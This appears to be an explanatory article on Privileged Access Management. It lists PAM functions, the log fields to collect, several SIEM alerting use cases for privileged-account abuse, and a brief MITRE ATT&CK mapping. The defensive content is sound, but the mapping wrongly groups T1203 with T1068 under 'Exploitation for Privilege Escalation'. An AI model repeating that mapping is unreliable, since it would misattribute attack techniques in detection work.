Privileged Access Management (PAM) is a critical aspect of information security that focuses on controlling, managing, and monitoring the access and activities of privileged users within an IT environment. Privileged users include administrators, superusers, and accounts with elevated rights that allow them to perform sensitive tasks, such as configuring system settings, managing network devices, modifying user accounts, and accessing confidential information.

Key Aspects of Privileged Access Management include:

1. Access Control: PAM ensures that only authorized users have access to critical systems and resources by managing privileges through policies and rules. This involves defining what each privileged account can do, with which devices, and under what circumstances.
2. Credential Management: Managing and securing the credentials for privileged accounts to prevent unauthorized access. This often involves using a centralized repository that can encrypt and store passwords, and possibly integrating with technologies like multi-factor authentication.
3. Session Management: Monitoring and recording sessions for all privileged account activities. This provides an audit trail that can be invaluable for forensic analysis following a security incident and for ongoing compliance with internal and regulatory requirements.
4. Least Privilege Enforcement: Ensuring that users are granted only the minimum level of access necessary to perform their job functions. This minimizes the risk and impact of a privileged account being misused or compromised.
5. Audit and Compliance: Keeping detailed logs of all privileged access and activities to meet compliance requirements for various regulatory frameworks. PAM tools often offer features to help automatically generate reports and conduct audits.
6. Threat Detection and Response: Analyzing data from privileged sessions to identify suspicious activities or potential breaches, enabling rapid response to mitigate threats.

Log Parameters:

1. User ID: Identifies the account used to perform privileged operations.
2. Action: Specifies the type of privileged activity performed, e.g., login, command execution, file access.
3. Timestamp: Records the exact time when the action was performed.
4. Result: Indicates whether the privileged action was successful or failed.
5. Session ID: A unique identifier for the session during which the privileged actions were performed.
6. Source IP: The IP address from which the privileged access was initiated.
7. Destination IP: The IP address of the system where privileged operations were performed.
8. Command Executed: Details the specific commands that were run during a session.
9. Elevation Method: Specifies how privileges were escalated, if applicable.

Use Cases for SIEM:

Unusual After-Hours Privileged Access

• Objective: To detect potential unauthorized or suspicious privileged access during non-business hours, which could indicate insider threats or compromised accounts.
• Method: Configure SIEM to alert when privileged actions are logged with a timestamp outside of standard operational hours, especially if they involve critical systems or high-risk operations.

Excessive Privileged Command Use

• Objective: To identify potential abuse or misuse of privileges by detecting an unusually high number of privileged commands executed within a short timeframe.
• Method: Set a threshold for the acceptable number of privileged commands per session or per hour. Use SIEM to monitor and alert when this threshold is exceeded, indicating possible malicious activity or policy violation.

Geographically Improbable Access

• Objective: To spot potential credential compromise or unauthorized access by detecting privileged access from locations inconsistent with the user’s normal patterns.
• Method: Integrate geographic IP location data into SIEM. Alert if privileged access is initiated from IPs located in unusual or high-risk geographical locations, especially if rapid successive logins occur from geographically distant locations.

Failed Privileged Access Attempts

• Objective: To monitor and respond to multiple failed attempts to use privileged accounts, as this may indicate a brute force or password spraying attack.
• Method: Use SIEM to track and alert on multiple failed privileged access attempts within a defined timeframe (e.g., 10 minutes), especially if the failures come from different source IPs or multiple user IDs.

Privilege Escalation Monitoring

• Objective: To detect unauthorized privilege escalations which can be a critical step in an attack chain.
• Method: Monitor for any changes in the elevation method parameter, and alert if an uncommon method or an unusually high frequency of privilege escalation is detected.

MITRE:

T1078: Valid Accounts, Adversaries may use valid accounts to access systems and perform tasks using privileged commands, appearing as legitimate users.

T1203 / T1068: Exploitation for Privilege Escalation, This technique involves exploiting software vulnerabilities to gain higher-level permissions. Frequent use of privilege escalation commands might indicate an ongoing attack.

T1059: Command and Scripting Interpreter, Attackers often use command-line interpreters to execute commands, scripts, or binary executables. Monitoring for excessive usage can help detect unauthorized actions or lateral movement.